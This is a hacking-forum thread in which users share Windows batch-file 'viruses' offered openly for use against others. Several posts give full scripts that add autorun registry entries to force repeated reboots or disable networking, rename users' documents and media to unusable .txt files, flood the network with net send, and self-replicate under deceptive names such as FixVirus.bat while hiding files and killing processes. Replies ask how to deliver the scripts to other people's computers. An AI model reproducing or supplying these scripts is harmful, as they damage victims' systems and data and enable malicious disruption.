Go Back   Yahoo Booters And Yahoo Tools > PC Related > Programming related

Programming related Anything about programming in here ! Ask help if you need ! Share sources.

Similar Threads
Thread Thread Starter Forum Replies Last Post
DELmE's Batch Virus Generator v1.0 MarricK Hackers' Lounge 0 01-10-2010 08:07 PM
quizz batch virus gakuso Hackers' Lounge 5 12-05-2009 05:06 PM
batch file help dondon Programming related 0 05-06-2009 06:40 PM
Batch file virus ? ___RaaVaNaN___ Hackers' Lounge 0 02-10-2009 10:29 AM
Virus Spreading (Source Codes) Grizzly Hackers' Lounge 0 08-12-2008 05:59 PM

Post New Thread  Reply
 
LinkBack Thread Tools Display Modes
Old 02-06-2008, 10:45 AM   #1 (permalink)
Quits Viprasys,Thank you.
 
Join Date: Dec 2007
Location: ---CyBeR-CitY---
Posts: 1,867
VipraSys Cash: 37,990.21
Thanks: 31
Thanked 3,476 Times in 917 Posts
shabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond repute
Send a message via AIM to shabzl33t Send a message via Yahoo to shabzl33t
Programming batch file programmed virus {CODES}

Here is some batch file programmed virus

Shutdown computer everytime it is turned on
(save as hshutdown.bat)

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
_______________________
Disable internet permanently
(save as hinternet.bat)

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
______________________________
Change files to non-working TXT files
(save as txt.bat)

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
______________
System Meltdown
(save as Crash.bat)

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE
_____________________
Temporarily flood network
(save as flood.bat)

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
_______________________
Temporarily disable internet
(save as internet.bat)

ipconfig /release

Shutdown Computer Once
(save as shutdown.bat)

shutdown -r -f -t0


Have FUn!!!! and dont end up messing ur own computer LOL
__________________

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Quits Viprasys, THANK YOU for everything.
shabzl33t is offline   Reply With Quote
The Following 9 Users Say Thank You to shabzl33t For This Useful Post:
ernes2diaz (03-03-2010), FuLcRuM (02-28-2008), k1ng.s0ngara (08-19-2010), nasirkhan (02-27-2008), pinoy___ (04-01-2008), Sc@rpIoNn (05-10-2008), smoke9140 (02-06-2008), xwlibri (03-06-2008), _Deth_ (02-02-2012)
Old 02-06-2008, 11:59 PM   #2 (permalink)
~~JhenNiMae~~ 0wnz™
 
_ylsen_'s Avatar
 
Join Date: Dec 2007
Location: ***801;***801;h€®€-†h€®€-€v€®ýwh€®€
Posts: 13,593
VipraSys Cash: 1,407,447.46
Thanks: 279
Thanked 6,015 Times in 3,782 Posts
_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute_ylsen_ has a reputation beyond repute
Default Re: batch file programmed virus {CODES}

hi bro how will i do this?am i going to save this to notepad and then put the name?when they open it it will works? teach me bro pls...thanks
_ylsen_ is offline   Reply With Quote
The Following 2 Users Say Thank You to _ylsen_ For This Useful Post:
FuLcRuM (02-28-2008), pinoy___ (04-01-2008)
Old 02-07-2008, 12:25 AM   #3 (permalink)
( Y ) ( Y ) Boobs
 
Join Date: Oct 2007
Posts: 1,675
VipraSys Cash: 143,899.33
Thanks: 71
Thanked 7,830 Times in 1,157 Posts
johnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond reputejohnnyjammer has a reputation beyond repute
Default Re: batch file programmed virus {CODES}

i like this one i made years ago :P
@echo off
title jammer rocks!
echo "Loading...................."
echo.
echo "Please wait....
cd %userprofile%
cd startm~1\programs\startupecho shutdown -s -t 00 >> x0x_jammer_x0x.bat
shutdown -r -t 30 -c "successfully loaded Windows Virus Detector enjoy"
exit
johnnyjammer is offline   Reply With Quote
The Following 3 Users Say Thank You to johnnyjammer For This Useful Post:
FuLcRuM (02-28-2008), pinoy___ (04-01-2008), xwlibri (03-06-2008)
Old 02-16-2008, 01:18 PM   #4 (permalink)
Quits Viprasys,Thank you.
 
Join Date: Dec 2007
Location: ---CyBeR-CitY---
Posts: 1,867
VipraSys Cash: 37,990.21
Thanks: 31
Thanked 3,476 Times in 917 Posts
shabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond repute
Send a message via AIM to shabzl33t Send a message via Yahoo to shabzl33t
Thumbs up Re: batch file programmed virus {CODES}

Quote:
Originally Posted by nash_arslan View Post
hi bro how will i do this?am i going to save this to notepad and then put the name?when they open it it will works? teach me bro pls...thanks


sorry was late reply u gotta copy the code and paste it in note pad or word pad and save it as anyting.bat file and when u open the bat file the virus will run!

:readrule:
__________________

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Quits Viprasys, THANK YOU for everything.
shabzl33t is offline   Reply With Quote
The Following 2 Users Say Thank You to shabzl33t For This Useful Post:
FuLcRuM (02-28-2008), pinoy___ (04-01-2008)
Old 02-16-2008, 01:21 PM   #5 (permalink)
___newbie___
 
Join Date: Oct 2007
Posts: 59
VipraSys Cash: 6,436.42
Thanks: 66
Thanked 114 Times in 31 Posts
bolbolito has a spectacular aura aboutbolbolito has a spectacular aura aboutbolbolito has a spectacular aura about
Send a message via Yahoo to bolbolito
Default Re: batch file programmed virus {CODES}

bro.. is this program cannot affect my computer? sorry i dont hav any idea.
bolbolito is offline   Reply With Quote
The Following 2 Users Say Thank You to bolbolito For This Useful Post:
FuLcRuM (02-28-2008), pinoy___ (04-01-2008)
Old 02-16-2008, 01:27 PM   #6 (permalink)
Quits Viprasys,Thank you.
 
Join Date: Dec 2007
Location: ---CyBeR-CitY---
Posts: 1,867
VipraSys Cash: 37,990.21
Thanks: 31
Thanked 3,476 Times in 917 Posts
shabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond repute
Send a message via AIM to shabzl33t Send a message via Yahoo to shabzl33t
Default Re: batch file programmed virus {CODES}

THis can mess ur PC very hard read the virus name B4 runing them!
__________________

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Quits Viprasys, THANK YOU for everything.
shabzl33t is offline   Reply With Quote
The Following 3 Users Say Thank You to shabzl33t For This Useful Post:
bolbolito (02-16-2008), FuLcRuM (02-28-2008), pinoy___ (04-01-2008)
Old 02-18-2008, 12:59 PM   #7 (permalink)
Elite Member
 
____[THE-CREED-CX23]____'s Avatar
 
Join Date: Jan 2007
Location: United Kingdom of the Philippines
Posts: 458
VipraSys Cash: 3,661.15
Thanks: 63
Thanked 702 Times in 229 Posts
____[THE-CREED-CX23]____ is a jewel in the rough____[THE-CREED-CX23]____ is a jewel in the rough____[THE-CREED-CX23]____ is a jewel in the rough____[THE-CREED-CX23]____ is a jewel in the rough
Default Re: batch file programmed virus {CODES}

MY question here is..... when i send this batchfile to another computer... would it keep executing the file... or just one time....?

PLEASE specify....THANKS
__________________

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

^:)^PROGRAMMERs LIES; COMPUTERS DON'T...>-)

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.
____[THE-CREED-CX23]____ is offline   Reply With Quote
The Following 2 Users Say Thank You to ____[THE-CREED-CX23]____ For This Useful Post:
FuLcRuM (02-28-2008), pinoy___ (04-01-2008)
Old 02-19-2008, 07:31 PM   #8 (permalink)
Quits Viprasys,Thank you.
 
Join Date: Dec 2007
Location: ---CyBeR-CitY---
Posts: 1,867
VipraSys Cash: 37,990.21
Thanks: 31
Thanked 3,476 Times in 917 Posts
shabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond repute
Send a message via AIM to shabzl33t Send a message via Yahoo to shabzl33t
Default Re: batch file programmed virus {CODES}

After the Format the PC will be clean

Note: All Bat virus will only hit C:/ Drive!
__________________

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Quits Viprasys, THANK YOU for everything.
shabzl33t is offline   Reply With Quote
The Following 2 Users Say Thank You to shabzl33t For This Useful Post:
FuLcRuM (02-28-2008), pinoy___ (04-01-2008)
Old 02-26-2008, 08:11 PM   #9 (permalink)
Quits Viprasys,Thank you.
 
Join Date: Dec 2007
Location: ---CyBeR-CitY---
Posts: 1,867
VipraSys Cash: 37,990.21
Thanks: 31
Thanked 3,476 Times in 917 Posts
shabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond reputeshabzl33t has a reputation beyond repute
Send a message via AIM to shabzl33t Send a message via Yahoo to shabzl33t
Thumbs up Re: batch file programmed virus {CODES}

This one is a simple batch virus
Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don't run this on ur pc

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP


------------------------------------------------------------------------------------------
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
__________________

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Quits Viprasys, THANK YOU for everything.
shabzl33t is offline   Reply With Quote
The Following 4 Users Say Thank You to shabzl33t For This Useful Post:
FuLcRuM (02-28-2008), N-M-Y! (02-26-2008), pinoy___ (04-01-2008), xwlibri (03-06-2008)
Old 02-26-2008, 08:48 PM   #10 (permalink)
Member
 
Join Date: Dec 2006
Location: In Hell
Posts: 536
VipraSys Cash: 12,944.95
Thanks: 90
Thanked 401 Times in 120 Posts
N-M-Y! will become famous soon enoughN-M-Y! will become famous soon enough
Send a message via Yahoo to N-M-Y!
Default Re: batch file programmed virus {CODES}

Sorry shabz but kasper detect it when its txt file i cant save it :
__________________
I am Now Offline

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.
N-M-Y! is offline   Reply With Quote
The Following 2 Users Say Thank You to N-M-Y! For This Useful Post:
0utl4w (04-11-2012), Sc@rpIoNn (05-10-2008)
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 05:34 AM.


Powered by vBulletin®
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.6.1
vBCredits II Deluxe - vBulletin Mods & Addons Copyright © 2010-2013 DragonByte Technologies Ltd.
The logos and trademarks used on this site are the property of their respective owners.
We are not responsible for comments posted by our users, as they are the property of the poster.